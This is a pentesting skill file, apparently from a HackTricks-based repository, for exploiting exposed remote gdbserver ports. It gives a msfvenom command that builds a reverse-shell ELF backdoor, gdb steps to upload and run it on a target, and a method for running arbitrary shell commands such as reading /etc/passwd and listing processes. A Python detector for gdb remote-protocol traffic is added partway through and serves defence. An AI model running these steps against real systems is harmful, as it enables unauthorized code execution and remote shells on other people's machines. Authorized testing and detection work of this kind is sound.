Hacktricks-skills pentesting-remote-gdbserver

Exploit remote gdbserver instances for pentesting. Use this skill whenever you encounter an open gdbserver port during reconnaissance, need to debug a remote process, want to upload and execute binaries on a target, or need to run arbitrary commands through a gdb connection. Trigger on mentions of gdbserver, remote debugging, port scanning results showing unknown services, or when you need to interact with a remote debugging session.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-remote-gdbserver/SKILL.MD

Pentesting Remote GdbServer

This skill helps you exploit remote gdbserver instances discovered during pentesting engagements. Gdbserver allows remote debugging of programs and can be leveraged for code execution on target systems.

When to Use This Skill

  • You've discovered an open port that might be gdbserver (nmap doesn't recognize it by default)
  • You have access to a remote debugging session and need to interact with it
  • You need to upload and execute binaries on a target system
  • You want to run arbitrary commands through a gdb connection
  • You're working with a target that has debugging capabilities exposed

Basic Information

gdbserver runs alongside the program being debugged on the target system. It allows the GNU Debugger (gdb) to connect from a different machine (the host) where source code and binary copies are stored. Connections can be made over TCP or serial lines.

Key facts:

  • Gdbserver can listen on any port
  • Nmap cannot automatically recognize gdbserver services
  • You can upload files and execute commands through the debugging interface

Exploitation Method 1: Upload and Execute ELF Backdoor

This method creates a malicious ELF binary, uploads it to the target, and executes it through gdb.

Step 1: Create a Reverse Shell Binary

# Generate an ELF backdoor with msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> PrependFork=true -f elf -o binary.elf

# Make it executable
chmod +x binary.elf

Step 2: Connect to Remote Gdbserver

# Start gdb with your binary (from your shell)
gdb binary.elf

# At the (gdb) prompt, set the remote debugging target
target extended-remote <TARGET_IP>:<TARGET_PORT>

Step 3: Upload and Execute

# Upload the ELF file to the target
remote put binary.elf binary.elf

# Set the remote executable file path
set remote exec-file /path/to/binary.elf

# Execute the binary (triggers reverse shell)
run

Expected result: You should receive a reverse shell connection on your listener.
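
From the monitoring side, the remote put and run steps above appear on the wire as GDB Remote Serial Protocol (RSP) packets, which gives a signature for gdbserver traffic even on a port that scanners do not label. The following is an added example, not part of the original skill or its bundled scripts: it classifies one direction of a captured TCP stream, and the sample bytes and the /tmp/sample.elf path are constructed for illustration.

```python
import re

# RSP framing: $<payload>#<two hex digits>; the digits are the sum of the
# payload bytes modulo 256. '$' and '#' inside binary data are escaped by the
# protocol, so they never appear raw in a payload.
PACKET = re.compile(rb"\$([^#$]*)#([0-9a-fA-F]{2})")

# Packet prefixes that gdb sends for the commands used in Method 1.
RISKY = {
    b"vFile:open": "host I/O file open (remote put/get)",
    b"vFile:pwrite": "host I/O file write (remote put)",
    b"vRun": "program start requested by debugger (run)",
}

def checksum(payload):
    return sum(payload) % 256

def frame(payload):
    """Wrap a payload as an RSP packet (used to build the sample below)."""
    return b"$" + payload + b"#%02x" % checksum(payload)

def rsp_packets(stream):
    """Payloads of all well-formed packets whose checksum verifies."""
    return [m.group(1) for m in PACKET.finditer(stream)
            if checksum(m.group(1)) == int(m.group(2), 16)]

def classify(stream):
    """Summarise one direction (client to server) of a captured TCP stream."""
    packets = rsp_packets(stream)
    return {
        "is_rsp": any(p.startswith(b"qSupported") for p in packets),
        "extended_mode": b"!" in packets,  # '!' = target extended-remote
        "findings": sorted({label for p in packets
                            for prefix, label in RISKY.items()
                            if p.startswith(prefix)}),
    }

# Constructed sample: what a monitor might capture from a gdb client.
PATH_HEX = b"/tmp/sample.elf".hex().encode()
SAMPLE = b"+".join(frame(p) for p in [
    b"qSupported:multiprocess+;vContSupported+",
    b"!",
    b"vFile:open:" + PATH_HEX + b",601,1c0",
    b"vFile:pwrite:3,0,\x7fELF",
    b"vRun;" + PATH_HEX,
])

if __name__ == "__main__":
    print(classify(SAMPLE))
```

A stream that reports is_rsp on a production host, and especially one with file-write or vRun findings, points to a debugger endpoint that should not be reachable from the network.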

Exploitation Method 2: Execute Arbitrary Commands

This method uses a custom Python script to execute arbitrary shell commands through the gdb connection.

Step 1: Prepare the Remote Command Script

Use the bundled script scripts/remote-cmd.py, which provides the rcmd command for executing shell commands remotely.

Step 2: Connect and Load the Script

# Connect to the remote gdbserver
target extended-remote <TARGET_IP>:<TARGET_PORT>

# Load the custom gdb command
source scripts/remote-cmd.py

Step 3: Execute Commands

# Change to a trusted binary and run it
set remote exec-file /bin/bash
r

# Run until libc is loaded (e.g., start of main)
tb main
r

# Execute arbitrary commands using rcmd
rcmd ls
rcmd whoami
rcmd cat /etc/passwd
rcmd id

Common Commands

Once connected, you can execute various commands:

# System information
rcmd uname -a
rcmd hostname
rcmd cat /etc/os-release

# User and privilege information
rcmd id
rcmd whoami
rcmd groups

# File system exploration
rcmd ls -la /
rcmd find /home -type f -name "*.txt"
rcmd cat /etc/passwd

# Network information
rcmd netstat -tulpn
rcmd ss -tulpn
rcmd ip addr

# Process information
rcmd ps aux
rcmd top -bn1

Troubleshooting

Connection Issues

  • Verify the target port is actually running gdbserver
  • Check firewall rules between your machine and the target
  • Ensure you have a compatible binary for the target architecture

Command Execution Fails

  • Make sure libc is loaded before running commands (use tb main, then r)
  • Check that the tmp file path is writable on the target
  • Verify the target has /bin/sh or /bin/bash available

Upload Fails

  • Ensure you have write permissions in the target directory
  • Try uploading to a different location (e.g., /tmp/)
  • Check available disk space on the target

Safety Notes

  • Only use this skill on systems you have explicit authorization to test
  • Document all actions taken during the engagement
  • Be aware that executing arbitrary commands can destabilize the target system
  • Clean up any files you upload after testing is complete
